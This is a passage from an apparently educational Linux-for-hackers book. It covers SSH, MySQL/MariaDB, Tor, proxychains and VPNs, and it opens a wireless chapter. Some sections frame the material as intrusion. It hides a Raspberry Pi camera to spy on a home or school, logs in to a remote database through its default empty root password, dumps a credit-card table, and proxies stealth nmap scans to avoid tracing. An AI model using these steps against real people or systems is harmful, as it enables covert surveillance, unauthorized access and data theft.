SSH is an acronym for Secure Shell and is basically what enables us to
connect securely to a terminal on a remote system—a replacement for the
insecure telnet that was so common decades ago. When we’re building a
web server, SSH enables us to create an access list (a list of users who can
use this service), authenticate users with encrypted passwords, and encrypt
all communication. This reduces the chance of unwanted users using the
remote terminal (due to the added authentication process) or intercepting
our communication (due to encryption). Probably the most widely used
Linux SSH service is OpenSSH, which is installed on nearly every Linux
distribution, including Kali.
System administrators often use SSH to manage remote systems, and
hackers often use SSH to connect to compromised remote systems, so we’ll
do the same here. In this example, we use SSH to set up a remote Raspberry
Pi system for spying, something I call the “Raspberry Spy Pi.” For this,
you’ll need a Raspberry Pi and the attendant Raspberry Pi camera module.
Before we do that, though, start OpenSSH on your Kali system with the
now familiar command:
kali> sudo systemctl start ssh

We’ll be using SSH to build and control a remote spying Raspberry Pi. If
you’re not already familiar with it, the Raspberry Pi is a tiny but powerful,
credit card–sized computer that works great as a remote spying tool. We
will employ a Raspberry Pi with a camera module to use as a remote spying
device. You can purchase a Raspberry Pi at nearly any electronics retailer,
including Amazon, for less than $50, and you can get the camera module
for about $15.
Here, we’ll use the Raspberry Spy Pi on the same network as our Kali
system, which allows us to use private, internal IP addresses. Of course,
when hacking in the real world, you’d probably want to set it up on another
remote network, but that would be a touch more difficult and beyond the
scope of this book.
Setting Up the Raspberry Pi
Make certain that your Raspberry Pi is running the Raspberry Pi OS; this is
simply another Linux distribution specifically ported for the Raspberry Pi
CPU. You can find download and installation instructions for Raspberry Pi
OS at https://www.raspberrypi.com/software/operating-systems/. Nearly
everything you’ve learned in this book applies to the Raspberry Pi OS on
the Raspberry Pi as well as Kali, Ubuntu, and other Linux distributions.
Once you have your Raspberry Pi OS downloaded and installed, you’ll
need to connect your Raspberry Pi to a monitor, mouse, and keyboard and

then connect it to the internet. If this is all new to you, check out the
instructions at
https://www.raspberrypi.com/documentation/accessories/keyboard-and-
mouse.html. With everything set up, you can log in with the username pi
and the password raspberry on older versions of Raspberry Pi, or create
your own username and password on later versions (see
https://www.raspberrypi.com/documentation/computers/getting-
started.html#locale for details).
Building the Raspberry Spy Pi
The first step is to make certain that SSH is running and enabled on the
Raspberry Spy Pi. SSH is usually off by default, so check the
documentation for your version for details on how to enable it.
When SSH is enabled, you can start it on your Raspberry Spy Pi by opening
a terminal and entering the following:
pi> sudo systemctl ssh start
Next you need to attach your camera module. If you’re using a Raspberry
Pi version 3 board, there’s only one place to connect it. Switch the Pi off,
attach the module to the camera port, and then switch it on again. Note that
the camera is very fragile and must never come into contact with the

general-purpose input/output (GPIO) pins; otherwise, it might short and die.
(Other boards will be different; check the documentation.)
Now, with the SSH service up and running, place the Raspberry Spy Pi
somewhere within your home, school, or some other location you want to
spy on. It must, of course, be connected to the local area network, either by
Ethernet cable or, ideally, via Wi-Fi.
Now, you need to obtain the IP address of your Raspberry Pi. As you
learned in Chapter 3, you can get a Linux device’s IP address by using
ifconfig:
pi> ifconfig
The IP address of my Pi is 192.168.1.101, but make certain you are using
the IP address of your Raspberry Spy Pi wherever my address appears in
this chapter. Now, from your Kali system, you should be able to connect
directly to and control your Raspberry Spy Pi and use it as a remote spying
system. In this simple example, your system will need to be on the same
network as the Pi.
To connect to the remote Raspberry Spy Pi via SSH from your Kali system,
enter the following, remembering to use your own Pi’s IP address:

kali> ssh pi@192.168.1.101
pi@192.168.1.101’s password:
The programs included with the Debian GNU/Linux s
the exact distribution terms for each program are
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANT
permitted by applicable law
last login: Tues Jan. 1 12:01:01 2025
pi@raspberyypi: $
The Spy Pi will then prompt you for a password. In this case, the default
password is raspberry, unless you’ve changed it.
Configuring the Camera
Next, we need to configure the camera. To do so, start the Raspberry Pi
configuration tool by entering the following command:
pi> sudo raspi-config
This should launch a graphical menu where you can select and enable the
camera. You’ll need to reboot, and then your Raspberry Spy Pi camera
should be enabled and ready for spying!

Starting to Spy
Once your Raspberry Spy Pi has rebooted and you have logged in to it via
SSH from your Kali terminal, you are ready to start using it to spy by taking
still pictures.
NOTE
The older Raspbian operating system had an application
named raspistill, which was covered in the first edition of
this book and has since been deprecated. The newer rpicam-
still application supports many of the options that raspistill
provided.
To take a picture and save it as a JPEG, enter the following:
pi@raspberrypi: rpicam-still --output firstpicture.jpg
We’ve taken our very first spy picture, with the filename of firstpicture.jpg
on our remote Raspberry Spy Pi using SSH!
For more details on using the software tools for RPi cameras, see
https://www.raspberrypi.com/documentation/computers/camera_software.ht
ml#rpicam-jpeg. Feel free to explore this versatile weapon further.

Extracting Information from MySQL/MariaDB
MySQL is the most widely used database behind database-driven web
applications. In our modern era of web technologies, where nearly every
website is database-driven, this means MySQL or another open source
database called MariaDB holds the data for most of the web.
Databases are the “golden fleece” for hackers. They contain critical
information about users as well as confidential information such as credit
card numbers. For this reason, hackers are most often targeting databases.
Like Linux, MySQL and MariaDB are open source and licensed under GPL
(GNU General Public License), and you’ll find at least one of them
preinstalled on nearly every Linux distribution.
Being free, open source, and powerful, MySQL and MariaDB have become
the databases of choice for many web applications, including popular
websites such as WordPress, Facebook, LinkedIn, X (formerly Twitter),
Kayak, Walmart.com, Wikipedia, and YouTube. Other popular content
management systems (CMSes) such as Joomla, Drupal, and Ruby on Rails
all use MySQL, too. You get the idea. If you want to develop or attack the
backend databases of web applications, you should know a little MySQL.
In the following sections, I’ll assume you’re working from MySQL, though
the commands will work for either MariaDB or MySQL; the output will
just be a little different. Let’s get started.

PAST AND FUTURE OF MYSQL
MySQL was first developed by MySQL AB of Sweden in 1995 and then
was purchased by Sun Microsystems in 2008, which in turn was purchased
by Oracle in 2009, so MySQL is now owned by Oracle. Oracle is the
world’s largest database software publisher, so the open source community
has significant trepidations about Oracle’s commitment to keeping MySQL
open source. As a result, there is now a fork of the MySQL database
software called “Maria” that is committed to keeping this software and its
subsequent versions open source. As a Linux admin or hacker, you should
keep an eye on Maria.
Starting MySQL or MariaDB
Fortunately, Kali has either MySQL or MariaDB already installed (if you’re
using another distribution, you can download and install MySQL from the
software repository or directly from https://www.mysql.com/downloads/).
To start your MySQL or MariaDB service, enter the following into the
terminal:
kali> sudo systemctl start mysql

Next, you need to authenticate yourself by logging in. Enter the following
and, when prompted for a password, just press ENTER:
kali> sudo mysql -u root -p
Enter password:
Welcome to MariaDB monitor. Commands end with ; o
Your MariaDB connection id is 31
Server version: 11.4.4-MaraiDB-3 Debian n/a
--snip--
Type 'help;' or '\h' for help. Type '\c' to clear
MariaDB[(none)] >
In the default configuration of MySQL or MariaDB, the root user’s
password is empty. Obviously, this is a major security vulnerability, and you
should remedy it by adding a password after your first login. Note that
usernames and passwords for your operating system and MySQL are
separate and distinct. Let’s change the password for the MySQL root user
now in order to be safe.
Interacting with SQL
SQL is an interpreted programming language for interfacing with a
database. The database is often a relational database, meaning data is stored
in multiple tables that interact, and each table has values in one or more
columns and rows.

There are several implementations of SQL, each with its own commands
and syntax, but here are a few common commands:
select Retrieves data
union Combines the results of two or more select operations
insert Adds new data
update Modifies existing data
delete Deletes data
You can supply conditions to each command to be more specific about what
you want to do. For example, the line
select user, password from customers where user=
will return the values for the user and password fields for any user whose user
value is equal to admin in the customers table.
Setting a Password
Let’s see what users are already in our MySQL system by entering the
following. (Note that commands in MySQL are terminated with a
semicolon.)
mysql> select user, host, password from mysql.user;
+------------------------------------------------

| user                   | host                  
+------------------------------------------------
|root                    |localhost              
--snip--
This shows that the root users have no password set. Let’s assign a
password to root. To do so, we’ll first select a database to work with.
MySQL on your system will come with some databases already set up. Use
the show databases; command to see all the available databases:
mysql> show databases;
+-------------------------------+
| Database                      |
+-------------------------------+
| information_schema            |
| mysql                         |
| performance_schema
  sys            |
+-------------------------------+
4 rows in set (0.23 sec)
MariaDB/MySQL comes with four databases by default, two of which
(information_schema and performance_schema) are administrative databases that
we won’t use here. We’ll use the non-administrative database, mysql, which
is included for your own purposes. To begin using the mysql database, enter:

MariaDB[mysql]> use mysql;
Reading table information for completion of table
You can turn off this feature to get a quicker st
Database changed
This command connects us to mysql. Now, we can set the password for the
root user to hackers-arise with the following command:
MariaDB[mysql]> set PASSWORD FOR 'root'@localhost = PAS
This command will update the user by setting the user’s root password to
hackers-arise.
To check to see whether the password has been changed, we can once again
run the previous command to check the account passwords:
MariaDB[mysql]> select user, host, password from mysql.
+-------------+-----------+----------------------
| User        | Host      | Password             
+-------------+-----------+----------------------
| mariadb.sys | localhost |                      
| root        | localhost | *FED2FC7AF828E509C6D4
| mysql       | localhost | invalid

+-------------+-----------+----------------------
3 rows in set (0.002 sec)
As shown in the output, the root account now has a password! Note that the
passwords are hashed (one-way encryption), so only the hash of the
password is visible.
Accessing a Remote Database
To access a MySQL database on the localhost, we use the following syntax:
kali> mysql -u <username> -p
This command defaults to using the MySQL instance on the localhost if it
isn’t given a hostname or IP address. To access a remote database, then, we
need to provide the hostname or IP address of the system that is hosting the
MySQL database. Here’s an example:
kali> mysql -u root -p 192.168.1.101
This will connect us to the MySQL instance at 192.168.1.101 and prompt
us for a password. For demonstration purposes, I am connecting to a
MySQL instance on my local area network (LAN). If you have a system on
your network with MySQL installed, use its IP address here. I will assume

you’ve managed to bypass the password and have logged in to the system
as root (you already know that by default, the mysql database has no
password).
This opens up the MySQL command line interface, which provides us with
the mysql> prompt. As well as this command line interface, MySQL has GUI
interfaces—both native (MySQL Workbench) and third-party (Navicat and
TOAD for MySQL). For you as a hacker, the command line interface may
be the best opportunity for exploiting the MySQL database, so we’ll focus
on that here. It’s unlikely that as an unauthorized entrant to the database,
you will be presented with an easy-to-use GUI.
NOTE
Remember that all commands must end in a semicolon or \g
(unlike Microsoft’s SQL Server) and that we can get help by
entering help; or \h.
Now that we’re logged in as the system admin, we can navigate unimpeded
through the database. If we had logged in as a regular user, our navigation
would be limited by the permissions provided by the system administrator
for that user.
Connecting to a Database

With access to the system, we want to snoop around. Our next step is to
find out whether there are any databases worth accessing. Here is the
command to find which databases are on the accessed system:
mysql> show databases;
+-------------------------------+
| Database                      |
+-------------------------------+
| information schema            |
| mysql                         |
| creditcardnumbers             |
| performance_schema            |
+-------------------------------+
4 rows in set (0.26 sec)
Aha! We’ve found a database worth exploring named creditcardnumbers. Let’s
connect to it.
In MySQL, as in other database management systems, we can connect to
the database we are interested in by entering use databasename;.
mysql> use creditcardnumbers;
Database changed

The Database changed response indicates that we are now connected to the
creditcardnumbers database.
Of course, it should go without saying that it’s unlikely a database admin
would be so accommodating as to name a database something as easily
recognizable as creditcardnumbers, so you may need to do a bit of exploring
to find a database of interest.
Exploring Database Tables
We are now connected to the creditcardnumbers database and can do a bit of
exploring to see what information it might hold. Data in a database is
organized into tables, and each table might hold a different set of related
data. We can find out what tables are in this database by entering the
following command:
mysql> show tables;
+-----------------------------------+
| Tables_in_creditcardnumbers       |
+-----------------------------------+
|  cardnumbers                      |
+-----------------------------------+
1 row in set (0.14 sec)
Here, we can see that this database has just one table in it, called cardnumbers.
Generally, databases will have numerous tables in them, so it’s likely you’ll

have to do a bit more snooping. In this sample database, we are fortunate to
be able to focus our attention on this single table to extract the hacker’s
golden fleece!
Now that we have a table we want to examine, we need to understand the
structure of that table. Once we know how the table is laid out, we can
extract the relevant information.
You can see the structure of the table using the describe statement, like so:
mysql> describe cardnumbers;
+---------------+--------------+---------+-------
| Field         | Type         | Null    | Key   
+---------------+--------------+---------+-------
| customers     | varchar(15)  | YES     |       
| address       | varchar(15)  | YES     |       
| city          | varchar(15)  | YES     |       
| state         | varchar(15)  | YES     |       
| cc            | int(12)      | NO      |       
+---------------+--------------+---------+-------
MySQL responds with the critical information on the structure of our table
of interest. We can see the name of each field as well as the data type it
holds (often the text type varchar or integer type int). We can also see
whether it will accept NULL values; the key, if any exists (the key links

tables); any default values a field might have; and any extra information at
the end, such as notes.
Examining the Data
To actually see the data in the table, we use the SELECT command. The SELECT
command requires you to know the following information:
The table that holds the data you want to view
The columns within that table that hold the data you want to view
We lay this out in the following format:
SELECT columns FROM table;
As a handy shortcut to look at data from all the columns, we can use an
asterisk as a wildcard instead of typing out every column name we want to
look at. So, to see a dump of all the data from the cardnumbers table, we enter
the following:
mysql> SELECT * FROM cardnumbers;
+-----------+---------------+-------------+------
| customers | address       | city        | state
+-----------+---------------+-------------+------
| Jones     |  1 Wall St    | NY          | NY   
| Sawyer    | 12 Piccadilly | London      | UK

| Doe       | 25 Front St   | Los Angeles | CA   
+-----------+---------------+-------------+------
As you can see, MySQL has displayed all the information from the
cardnumbers table to our screen. We have found the hacker’s golden fleece!
Summary
Linux has numerous services that run in the background until the user needs
them. The Apache web server is the most widely used, but a hacker should
be familiar with MySQL and SSH for various tasks, too. In this chapter, we
covered the absolute basics of getting started with these services. Once
you’re comfortable with your Linux system, I urge you to go out and
explore each of these services further.
Exercises
1. Start your apache2 service through the command line.
2. Using the index.html file, create a simple website announcing your
arrival into the exciting world of hacking.
3. Start your SSH service via the command line. Now connect to your Kali
system from another system on your LAN.
4. Start your MySQL database service and change the root user password to
hackers-arise. Change to the mysql database.

OceanofPDF.com

13
BECOMING SECURE AND
ANONYMOUS

Today, nearly everything we do on the internet is tracked. Whoever is doing
the tracking—whether it be Google tracking our online searches, website
visits, and email or the National Security Agency (NSA) cataloging all our
activities—our every online move is being recorded, indexed, and then
mined for someone’s benefit. The average individual—and the hacker, in
particular—needs to understand how to limit this tracking and remain
relatively anonymous on the web to limit this ubiquitous surveillance.
In this chapter, we look at how you can navigate the World Wide Web
anonymously (or as close as you can get) using four methods:
The Onion Network
Proxy servers
Virtual private networks
Private encrypted email
No one method is sure to keep your activities safe from prying eyes, and
given enough time and resources, anything can be tracked. However, these
methods will likely make the tracker’s job much more difficult.
How the Internet Gives Us Away
To begin, let’s discuss at a high level some of the ways our activities on the
internet are tracked. We won’t go into all tracking methods or into too much
detail about any one method, as that would be beyond the scope of this
book. Indeed, such a discussion could take up an entire book on its own.

First, your IP address identifies you as you traverse the internet. Data sent
from your machine is generally tagged with your IP address, making your
activities easy to track. Second, Google and other email services will “read”
your email, looking for keywords to more efficiently serve you ads.
Although there are many more sophisticated methods that are far more time
and resource intensive (cookie tracking, user-agent, and so on), these are the
ones we try to prevent in this chapter. Let’s start by taking a look at how IP
addresses give us away on the internet.
When you send a packet of data across the internet, it contains the IP
addresses of the source and destination for the data. In this way, the packet
knows where it is going and where to return the response. Each packet hops
through multiple internet routers until it finds its destination and then hops
back to the sender. For general internet surfing, each hop is a router the
packet passes through to get to its destination. There can be as many as 20
to 30 hops between the sender and the destination, but usually any packet
will find its way to the destination in less than 15 hops.
As the packet traverses the internet, anyone intercepting the packet can see
who sent it, where it has been, and where it’s going. This is one way
websites can tell who you are when arrive and log you in automatically, and
it’s also how someone can track where you’ve been on the internet.
To see what hops a packet might make between you and the destination,
you can use the traceroute command. Simply enter traceroute and the

destination IP address or domain, and the command will send out packets to
the destination and trace the route of those packets:
kali> traceroute google.com
traceroute to google.com (172.217.1.78), 30 hops 
1   192.168.1.1 (192.168.1.1)   4.152 ms 3.834 ms
2   10.0.0.1 (10.0.0.1)  5.797 ms 6.995 ms 7.679 
3   96.120.96.45 (96.120.96.45)  27.952 ms 30.377
--snip--
18 lgal15s44-in-f14.le100.net (172.217.1.78)  94
As the output shows, www.google.com is 18 hops across the internet from
me. Your results will likely be different because your request would be
coming from a different location and because Google has many servers
across the globe. In addition, packets don’t always take the same route
across the internet, so you might send another packet from your address to
the same site and receive a different route. Let’s see how we can disguise all
this with the Tor network.
The Onion Router System
In the 1990s, the US Office of Naval Research (ONR) set out to develop a
method for anonymously navigating the internet for espionage purposes.
The plan was to set up a network of routers that was separate from the

internet’s routers, that could encrypt the traffic, and that stored only the
unencrypted IP address of the previous router—meaning all other router
addresses along the way were encrypted. The idea was that anyone
watching the traffic could not determine the origin or destination of the
data. This research became known as “The Onion Router (Tor) Project” in
2002, and it’s now available to anyone to use for relatively safe and
anonymous navigation on the web.
How Tor Works
Packets sent over Tor are not sent over the regular routers that are closely
monitored by so many, but rather they are sent over a network of more than
7,000 routers around the world—thanks to volunteers who allow Tor to use
their computers. On top of using a totally separate router network, Tor
encrypts the data, destination, and sender IP address of each packet. At each
hop, the information is encrypted and then decrypted by the next hop when
it’s received. In this way, each packet contains information about only the
previous hop along the path and not the IP address of the origin. If someone
intercepts the traffic, they can see only the IP address of the previous hop,
and the website owner can see only the IP address of the last router that sent
the traffic (see Figure 13-1). This ensures relative anonymity across the
internet.

Figure 13-1: How Tor uses encrypted traffic data
To enable the use of Tor, just install the Tor browser from
https://www.torproject.org. Once installed, it will look something like
Figure 13-2, and you can use it like any old internet browser. By using this
browser, you’ll be navigating the internet through a separate set of routers
and will be able to visit sites without being tracked by Big Brother.
Unfortunately, the trade-off is that surfing via the Tor browser can be a lot
slower; because there are not nearly as many routers, the bandwidth is
limited in this network.

Figure 13-2: The landing page for the Tor browser
In addition to being capable of accessing nearly any website on the
traditional internet, the Tor browser is capable of accessing the dark web.
The websites that make up the dark web require anonymity, so they allow
access only through the Tor browser, and they have addresses ending in
.onion for their top-level domain. The dark web is infamous for illegal
activity, but a number of legitimate services are also available there. A word
of caution, however: when accessing the dark web, you may come across
material that many will find offensive.
Finding resources on the dark web can be a challenge for the uninitiated.
One of the best search engines on the dark web is Ahmia (Figure 13-3). You
can find it at
http://juhanurmihxlp77nkq76byazcldy2hlmovfu2epvl5ankdibsot4csyd.onion
.

Figure 13-3: The Ahmia search engine
Security Concerns
The intelligence and spy services of the United States and other nations
consider the Tor network a threat to national security, believing that such an
anonymous network enables foreign governments and terrorists to
communicate without being watched. As a result, a number of robust,
ambitious research projects are working to break the anonymity of Tor.
Tor’s anonymity has been broken before by these authorities and will likely
be broken again. The NSA, as one instance, runs its own Tor routers,
meaning that your traffic may be traversing the NSA’s routers when you use
Tor. If your traffic is exiting the NSA’s routers, that’s even worse, because
the exit router always knows your destination. The NSA also has a method
known as traffic correlation, which involves looking for patterns in

incoming and outgoing traffic, that has been able to break Tor’s anonymity.
Though these attempts to break Tor won’t affect Tor’s effectiveness at
obscuring your identity from commercial services, such as Google, they
may limit the browser’s effectiveness in keeping you anonymous from spy
agencies.
Proxy Servers
Another strategy for achieving anonymity on the internet is to use proxies,
which are intermediate systems that act as middlemen for traffic: the user
connects to a proxy, and the traffic is given the IP address of the proxy
before it’s passed on (see Figure 13-4). When the traffic returns from the
destination, the proxy sends the traffic back to the source. In this way,
traffic appears to come from the proxy and not the originating IP address.
Figure 13-4: Running traffic through a proxy server

Of course, the proxy will likely log your traffic, but an investigator would
have to get a subpoena or search warrant (or hack the server, something the
NSA is known to do) to obtain the logs. To make your traffic even harder to
trace, you can use more than one proxy, in a strategy known as a proxy
chain, which we’ll look at a little later in this chapter.
Kali Linux has an excellent proxying tool called proxychains that you can set
up to obscure your traffic. The syntax for the proxychains command is
straightforward, as shown here:
kali> proxychains <the command you want proxied> <argu
The arguments you provide might include an IP address. For example, if
you wanted to use proxychains to scan a site with nmap anonymously, you
would enter the following:
kali> proxychains nmap -sS -Pn <IP address>
This would send the nmap –sS stealth scan command to the given IP address
through a proxy. The tool then builds the chain of proxies itself, so you
don’t have to worry about it.
Setting Proxies in the Config File

In this section, we set a proxy for the proxychains command to use. As with
nearly every application in Linux/Unix, configuration of proxychains is
managed by the config file—specifically /etc/proxychains4.conf. Open the
config file in your text editor of choice with the following command
(replacing mousepad with your chosen editor if necessary):
kali> mousepad /etc/proxychains4.conf
You should see a file like the one shown in Listing 13-1.
# proxychains.conf VER 4.x
# HTTP, SOCKS4a, SOCKS5 tunneling proxifier with 
# The option below identifies how the ProxyList i
# only one option should be uncommented at time,
# otherwise the last appearing option will be acc
#
# dynamic_chain
#
# Dynamic - Each connection will be done via chai
# all proxies chained in the order as they appear
# at least one proxy must be online to play in ch
# (dead proxies are skipped)
# otherwise EINTR is returned to the app
#
# strict chain

#
# Strict - Each connection will be done via chain
# all proxies chained in the order as they appear
# all proxies must be online to play in chain
# otherwise EINTR is returned to the app
--snip--
Listing 13-1: The proxychains4.conf file
Scroll down this file to line 61, and you should see the ProxyList section, as
shown in Listing 13-2.
[ProxyList]
# add proxy here...
# meanwhile
# defaults set to "tor"
socks4 127.0.0.1 9050
Listing 13-2: The section of the config file for adding proxies
We can add proxies by entering the IP addresses and ports of the proxies we
want to use in this list. For now, we’ll use some free proxies. You can find
free proxies by googling “free proxies” or using the site
https://geonode.com/free-proxy-list, which looks something like Figure 13-
5. Note, however, that using free proxies in real-life hacking activity is not a

good idea. I’ll cover this in more detail later in the chapter. The example
used here is just for educational purposes.
Figure 13-5: Free proxies from https://geonode.com/free-proxy-list
Fill in the details in the form, then add one of the resulting proxies to your
proxychains4.conf file using the following format:
Type IPaddress Port
Here’s an example:
[ProxyList]
# add proxy here...
socks4 114.134.186.12 22020
# meanwhile

# defaults set to "tor"
# socks4 127.0.0.1 9050
It’s important to note that proxychains defaults to using Tor if you don’t enter
any proxies of your own. The last line in Listing 13-2 directs proxychains to
send traffic first through the host at 127.0.0.1 on port 9050 (the default Tor
configuration). If you’re not adding your own proxies and want to use Tor,
leave this as it is. If you are not using Tor, you’ll need to comment out this
line (add a # before it).
As much as I like Tor, as mentioned, it is usually very slow. Also, because
the NSA has broken Tor, I am much less likely to depend on it for
anonymity. I therefore comment out this line and add my own set of
proxies.
Let’s test it out. In this example, I am going to open the browser Firefox and
have it navigate to https://www.hackers-arise.com anonymously by sending
the traffic through a proxy.
The command is as follows:
kali> proxychains firefox www.hackers-arise.com
This successfully opens https://www.hackers-arise.com in Firefox through
my chosen proxy and returns the results to me. To anyone tracing this

traffic, it appears that it was my proxy that navigated to
https://www.hackers-arise.com rather than my IP address.
Configuring Some More Interesting Options
Now that we have proxychains working, let’s look at some other options we
can configure through the proxychains4.conf file. As we now have it set up,
we are simply using a single proxy. However, we can put in multiple
proxies and use all of them; we can use a limited number from the list; or
we can have proxychains change the order randomly. Let’s try all these
options.
Adding More Proxies
First, let’s add some more proxies to our list. Go back to the site
https://geonode.com/free-proxy-list and find some more proxy IP addresses.
Then add a few more of these proxies to your proxychains.conf file, like so:
[ProxyList]
# add proxy here...
socks4 114.134.186.12 22020
socks4 188.187.190.59 8888
socks4 181.113.121.158 335551
Now save this config file and try running the following command:

kali> proxychains firefox www.hackers-arise.com
You won’t notice any difference, but your packet is now traveling through
several proxies.
Setting Up Dynamic Chaining
With multiple IPs in our proxychains4.conf file, we can set up dynamic
chaining, which runs our traffic through every proxy on our list, and if one
of the proxies is down or not responding, it automatically goes to the next
proxy in the list without throwing an error. If we didn’t set this up, a single
failing proxy would break our request.
Go back into your proxychains configuration file, and find the dynamic_chain
line (line 10). Uncomment it, and also make sure you comment out the
strict_chain line if it isn’t already:
# dynamic_chain
#
# Dynamic – Each connection will be done via chai
# all proxies chained in the order as they appear
# at least one proxy must be online to play in ch
--snip--

This will enable dynamic chaining of our proxies, allowing for greater
anonymity and trouble-free hacking. Save the config file and feel free to try
it out.
Using Random Chaining
Our final proxy trick is the random chaining option, where proxychains will
randomly choose a set of IP addresses from our list and use them to create
our proxy chain. This means that each time we use proxychains, the proxy
will look different to the target, making it harder to track our traffic from its
source. This option is also considered “dynamic” because if one of the
proxies is down, it will skip to the next one.
Go back inside the /etc/proxychains4.conf file and comment out the lines
dynamic_chain and strict_chain by adding a # at the start of each line; then
uncomment the random_chain line. We can use only one of these three options
at a time, so make certain you comment out the other options before using
proxychains.
Next, find and uncomment the line with chain_len and then give it a
reasonable number. This line determines how many of the IP addresses in
your chain will be used in creating your random proxy chain:
# dynamic_chain
#
# Dynamic – Each connection will be done via chai

# all proxies chained in the order as they appear
# at least one proxy must be online to play in ch
#
# strict_chain
#
# Strict - Each connection will be done via chain
# all proxies chained in the order as they appear
# all proxies must be online to play in chain
# otherwise EINTR is returned to the app
#
random_chain
#
# Random - Each connection will be done via rando
# (or proxy chain, see chain_len) from the list.
# this option is good to test your IDS :)
# Makes sense only if random_chain
chain_len = 3
Here, I have uncommented chain_len and given it a value of 3, meaning
proxychains will now use three proxies from my list in the
/etc/proxychains.conf file, choosing them randomly and moving onto the
next one if a proxy is down. Note that although this method certainly
enhances your anonymity, it also increases the latency of your online
activities.

Now that you know how to use proxychains, you can do your hacking with
relative anonymity. I say “relative” because there is no surefire way to
remain anonymous with the NSA and FSB spying on our online activities—
but we can make detection much harder with the help of proxychains.
Concerning Security
As a last note on proxy security, be sure to choose your proxies wisely:
proxychains is only as good as the proxies you use. If you are intent on
remaining anonymous, do not use a free proxy, as mentioned earlier.
Hackers use paid-for proxies that can be trusted. In fact, the free proxies are
likely selling your IP address and browsing history. As Bruce Schneier, the
famous cryptographer and security expert, once said, “If something is free,
you’re not the customer; you’re the product.” In other words, any free
product is likely gathering your data and selling it. Why else would they
offer a proxy for free?
Although the IP address of your traffic leaving the proxy will be
anonymous, there are other ways for surveillance agencies to identify you.
For instance, the owner of the proxy will know your identity and, if
pressured enough by espionage or law enforcement agencies with
jurisdiction, may offer up your identity to protect their business. It’s
important to be aware of the limitations of proxies as a source of
anonymity.

Virtual Private Networks
Using a virtual private network (VPN) can be an effective way to keep your
web traffic relatively anonymous and secure. A VPN is used to connect to
an intermediary internet device such as a router that sends your traffic to its
ultimate destination tagged with the IP address of the router.
Using a VPN can certainly enhance your security and privacy, but it’s not a
guarantee of anonymity. The internet device you connect to must record or
log your IP address to be able to properly send the data back to you, so
anyone able to access these records can uncover information about you.
The beauty of VPNs is that they are simple and easy to work with. You can
open an account with a VPN provider and then seamlessly connect to the
VPN each time you log on to your computer. You would use your browser
as usual to navigate the web, but it will appear to anyone watching that your
traffic is coming from the IP address and location of the internet VPN
device and not your own. In addition, all traffic between you and the VPN
device is encrypted, so even your internet service provider can’t see your
traffic.
Among other things, a VPN can be effective in evading government-
controlled content and information censors. For instance, if your national
government limits your access to websites with a particular political
message, you can likely use a VPN based outside your country in order to

access that content. Some media corporations, such as Netflix, Hulu, and
HBO, limit access to their content to IP addresses originating from their
own nation. Using a VPN based in a nation that those services allow can
often get you around those access limitations.
Some of the best and most popular commercial VPN services, according to
CNET, are the following:
ExpressVPN
SurfShark
NordVPN
ProtonVPN (I use this service)
PIA
Most of these VPN services charge $50 to $100 per year, and many offer a
free 30-day trial. To find out more about how to set up a VPN, choose one
from the list and visit its website. You should find download, installation,
and usage instructions that are pretty easy to follow.
The strength of a VPN is that all your traffic is encrypted when it leaves
your computer, thus protecting you against snooping, and your IP address is
cloaked by the VPN IP address when you visit a site. As with a proxy
server, the owner of the VPN has your originating IP address (otherwise
they couldn’t send your traffic back to you). If they are pressured by
espionage agencies or law enforcement, they might give up your identity.

One way to prevent that is to use only VPNs that promise not to store or log
any of this information (and hope they are being truthful). In this way, if
someone insists that the VPN service provider turn over its data on its users,
there is no data.
Encrypted Email
Free commercial email services such as Gmail, Yahoo!, and Outlook Web
Mail (formerly Hotmail) are free for a reason: they are vehicles for tracking
your interests and serving up advertisements. As mentioned already, if a
service is free, you are the product, not the customer. In addition, the
servers of the email provider (Google, for example) have access to the
unencrypted contents of your email, even if you’re using HTTPS.
One way to prevent eavesdropping on your email is to use encrypted email.
ProtonMail, shown in Figure 13-6, encrypts your email from end to end or
browser to browser. This means that your email is encrypted on ProtonMail
servers—even the ProtonMail administrators can’t read your email.

Figure 13-6: The ProtonMail login screen
ProtonMail was founded by a group of young scientists at the CERN
supercollider facility in Switzerland. The Swiss have a long and storied
history of protecting secrets (remember those Swiss bank accounts you’ve
heard so much about?), and ProtonMail’s servers are based in the European
Union, which has much stricter laws regarding the sharing of personal data
than does the United States. ProtonMail does not charge for a basic account
but offers premium accounts for a nominal fee. It is important to note that
when exchanging email with non-ProtonMail users, there is the potential for
some or all of the email not to be encrypted. See the ProtonMail support
knowledge base for full details.
Summary

We are constantly being surveilled by commercial firms and national
intelligence agencies. To keep your data and web travels secure, you need to
implement at least one of the security measures discussed in this chapter.
By employing them in combination, you can minimize your footprint on the
web and keep your data much more secure.
Exercises
1. Run traceroute to www.hackers-arise.com. How many hops appear
between you and your favorite site?
2. Download and install the Tor browser. Now, browse anonymously
around the web just as you would with any other browser and see if you
notice any difference in speed.
3. Try using proxychains with the Firefox browser to navigate to your
favorite website.
4. Explore commercial VPN services from some of the vendors listed in
this chapter. Choose one and test a free trial.
5. Open a free ProtonMail account and send a secure greeting to
occupytheweb@protonmail.com.
OceanofPDF.com

14
UNDERSTANDING AND
INSPECTING WIRELESS
NETWORKS

The ability to scan for and connect to other network devices from your
system is crucial to becoming a successful hacker, and with wireless
technologies like Wi-Fi (IEEE 802.11) and Bluetooth being the standard,
finding and controlling Wi-Fi and Bluetooth connections is key. If someone
can hack a wireless connection, they can gain entry to a device and access

to confidential information. The first step, of course, is to learn how to find
these devices.
In Chapter 3, we looked at some basic networking commands in Linux,
including some of the fundamentals of wireless networking, with a promise
of more wireless networking to come in Chapter 14. As promised, here we
examine two of the most common wireless technologies in Linux: Wi-Fi
and Bluetooth.
Wi-Fi Networks
We’ll start with Wi-Fi. In this section, I’ll show you how to find, examine,
and connect to Wi-Fi access points. Before doing so, let’s go over some
basic Wi-Fi terms and technologies to help you better understand the output
from a lot of the queries we’ll make in this chapter:
AP (access point) This is the device wireless users connect to for
internet access.
ESSID (extended service set identifier) This is the same as the SSID,
which we discussed in Chapter 3, but it can be used for multiple APs in a
wireless LAN.
BSSID (basic service set identifier) This is the unique identifier of
each AP, and it is the same as the MAC address of the device.
SSID (service set identifier) This is the name of the network.

Channels Wi-Fi can operate on any one of 14 channels (1 to 14). In the
United States, Wi-Fi is limited to channels 1 to 11.
Power The closer you are to the Wi-Fi AP, the greater the power, and
the easier the connection is to crack.
Security This is the security protocol used on the Wi-Fi AP that is
being read from. There are three primary security protocols for Wi-Fi.
